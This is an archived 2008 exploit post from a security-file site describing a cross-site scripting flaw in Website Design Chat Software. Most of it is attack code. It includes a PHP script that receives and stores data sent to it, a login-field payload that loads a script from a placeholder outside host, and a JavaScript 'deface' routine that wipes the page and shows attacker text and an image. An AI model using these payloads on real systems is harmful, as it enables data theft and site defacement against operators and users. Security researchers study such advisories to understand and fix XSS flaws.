wdcs-xss.txt

wdcs-xss.txt: Posted Feb 11, 2008; Authored by The-0utl4w | Site aria-security.net; Website Design Chat Software suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 3b1327f3e451e67a8103aa4231fa083c2d6ba83a712360a82b550606f865fdce; Download | Favorite | View

wdcs-xss.txt

Aria-Security Team (Persian Security Network)
httP://Aria-Security.Net
---------------------------------------------
Shoutz: Aura, imm0rtal, Soot.Hackers, iM4N, 
A Special Thanks to my dear friend Mh_p0rtal for his great help in order to find this vuln.
Vendor: http://www.softwebsnepal.com
Demo: http://www.softwebsnepal.com/website_design_chat_software.htm
Original Advisory: http://forum.aria-security.net/showthread.php?t=517

First we need a little php file in order to get and save our needed information + A txt file to save them there and chmod must be 777 in order to work
[code]
<?php
if ( $_GET['text'] ) {
$text = $_GET['text'];
$filename = "Aria-Security.txt";
$fp = fopen( $filename, "w" ) or die("Couldn't open $filename");
fwrite( $fp, "$text" );
fclose( $fp );
}
//--------------
$filename = "test.txt";
$fp = fopen( $filename, "r" ) or die("Couldn't open $filename");
while ( ! feof( $fp ) )
{
$line = fgets( $fp, 1024 );
print "$line<br>";
}
fclose($fp);
?>
[/code]

login as:
<script src=http://Yourwebsite.com/yourfile.js></script>
(For Script Visit original link)


NOT RECOMENDED: Byt you can also just upload a "deface page", something like:


[code]
var title = "Aria-Security.Net";
var bgcolor = "#HEX";
var image_url = "http://ariahosting.ir/index.html";
var text = "The-0utl4w";
var font_color = "#HEX";

deface(title, bgcolor, image_url, text, font_color);
 
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
  document.title = pageTitle;
  document.body.innerHTML = '';
  document.bgColor = bgColor;
  var overLay = document.createElement("div");
  overLay.style.textAlign = 'center';
  document.body.appendChild(overLay);
  var txt = document.createElement("p");
  txt.style.font = 'normal normal bold 36px Verdana';
  txt.style.color = fontColor;
  txt.innerHTML = pageText;
  overLay.appendChild(txt);
 
  if (image_url != "") {
    var newImg = document.createElement("img");
    newImg.setAttribute("border", '0');
    newImg.setAttribute("src", imageUrl);
    overLay.appendChild(newImg);
  }

  var footer = document.createElement("p");
  footer.style.font = 'italic normal normal 12px Arial';
  footer.style.color = '#DDDDDD';
  footer.innerHTML = title;
  overLay.appendChild(footer);
}
[/code]

Regards,
The-0utl4w 
Credits Goes to Aria-Security Team
http://Aria-Security.Net

Top Authors In Last 30 Days

Red Hat 261 files
Ubuntu 106 files
indoushka 23 files
Debian 20 files
Gentoo 14 files
Google Security Research 13 files
CraCkEr 11 files
Mirabbas Agalarov 9 files
Apple 8 files
Ivan Fratric 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,755)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,851)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,365)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,645)
UNIX (9,245)
UnixWare (186)
Windows (6,555)
Other

wdcs-xss.txt

wdcs-xss.txt

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

wdcs-xss.txt

Share This

wdcs-xss.txt

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems